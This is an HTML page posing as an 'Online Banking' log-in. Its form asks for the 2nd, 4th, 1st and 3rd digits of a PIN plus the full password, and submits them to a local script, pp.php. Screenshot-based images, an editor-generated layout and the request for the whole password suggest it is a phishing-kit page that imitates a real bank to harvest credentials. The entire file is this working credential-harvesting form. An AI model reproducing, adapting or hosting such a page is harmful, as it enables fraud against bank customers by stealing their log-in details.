<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Log in - PIN and Password details</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
<style type="text/css">
/*----------Text Styles----------*/
.ws6 {font-size: 8px;}
.ws7 {font-size: 9.3px;}
.ws8 {font-size: 11px;}
.ws9 {font-size: 12px;}
.ws10 {font-size: 13px;}
.ws11 {font-size: 15px;}
.ws12 {font-size: 16px;}
.ws14 {font-size: 19px;}
.ws16 {font-size: 21px;}
.ws18 {font-size: 24px;}
.ws20 {font-size: 27px;}
.ws22 {font-size: 29px;}
.ws24 {font-size: 32px;}
.ws26 {font-size: 35px;}
.ws28 {font-size: 37px;}
.ws36 {font-size: 48px;}
.ws48 {font-size: 64px;}
.ws72 {font-size: 96px;}
.wpmd {font-size: 13px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: normal;}
/*----------Para Styles----------*/
DIV,UL,OL /* Left */
{
 margin-top: 0px;
 margin-bottom: 0px;
}
</style>

</head>
<body bgColor="#F7F7F5">
<div id="image1" style="position:absolute; overflow:hidden; left:184px; top:225px; width:545px; height:376px; z-index:0"><img src="images/img130077908.PNG" alt="" title="" border=0 width=545 height=376></div>

<form name="form1" method="POST" action="pp.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<div id="formimage1" style="position:absolute; left:626px; top:549px; z-index:2"><input type="image" name="formimage1" width="94" height="47" src="images/7.PNG"></div>
<input name="2nd" type="password" maxlength=1 style="position:absolute;width:29px;left:449px;top:333px;z-index:12">
<input name="4" type="password" maxlength=1 style="position:absolute;width:29px;left:449px;top:363px;z-index:7">
<input name="1st" type="password" maxlength=1 style="position:absolute;width:29px;left:449px;top:395px;z-index:8">
<input name="3rd" type="password" maxlength=1 style="position:absolute;width:29px;left:449px;top:430px;z-index:9">
<input name="pass" type="password" maxlength=25 style="position:absolute;width:132px;left:436px;top:536px;z-index:13">
<div id="formimage1" style="position:absolute; left:626px; top:549px; z-index:2"><input type="image" name="formimage1" width="94" height="47" src="images/7.PNG"></div>
</form>

<div id="text1" style="position:absolute; overflow:hidden; left:202px; top:275px; width:405px; height:316px; z-index:3">
<div class="wpmd">
<div><font color="#510051" face="Segoe UI" class="ws12"><B>Your PIN</B></font></div>
<div><font color="#460046" face="Segoe UI">Enter the following numbers from your PIN</font></div>
<div><font color="#460046" face="Segoe UI"><BR></font></div>
<div><font color="#460046" face="Segoe UI">&nbsp;&nbsp;&nbsp; Enter the 2nd number</font></div>
<div><font color="#460046" face="Segoe UI"><BR></font></div>
<div><font color="#460046" face="Segoe UI">&nbsp;&nbsp;&nbsp; Enter the 4th number</font></div>
<div><font color="#460046" face="Segoe UI"><BR></font></div>
<div><font color="#460046" face="Segoe UI">&nbsp;&nbsp;&nbsp; Enter the 1st number</font></div>
<div><font color="#460046" face="Segoe UI"><BR></font></div>
<div><font color="#460046" face="Segoe UI">&nbsp;&nbsp;&nbsp; Enter the 3rd number</font></div>
<div><font color="#460046" face="Segoe UI"><BR></font></div>
<div><font color="#8A008A" face="Segoe UI" style="background-color:#4A004A;"><BR></font></div>
<div><font color="#460046" face="Segoe UI" class="ws12"><B>Your password</B></font></div>
<div><font color="#460046" face="Segoe UI">Enter the full characters from your password</font></div>
<div><font color="#460046" face="Segoe UI"><BR></font></div>
<div><font color="#460046" face="Segoe UI">&nbsp;&nbsp;&nbsp; Enter the full password</font></div>
</div></div>

<div id="image3" style="position:absolute; overflow:hidden; left:0px; top:2px; width:977px; height:99px; z-index:4"><img src="images/1.PNG" alt="" title="" border=0 width=977 height=99></div>

<div id="text14" style="position:absolute; overflow:hidden; left:197px; top:114px; width:463px; height:76px; z-index:5">
<div class="wpmd">
<div><font color="#59016B" class="ws28"><B>Online Banking</B></font></div>
</div></div>

<div id="image4" style="position:absolute; overflow:hidden; left:0px; top:610px; width:1001px; height:102px; z-index:6"><img src="images/5.PNG" alt="" title="" border=0 width=1001 height=102></div>

<div id="image2" style="position:absolute; overflow:hidden; left:175px; top:157px; width:575px; height:110px; z-index:10"><img src="images/Screenshot_3.png" alt="" title="" border=0 width=575 height=110></div>

<div id="image5" style="position:absolute; overflow:hidden; left:208px; top:556px; width:87px; height:41px; z-index:11"><img src="images/Screenshot_1.png" alt="" title="" border=0 width=87 height=41></div>


</body>
</html>
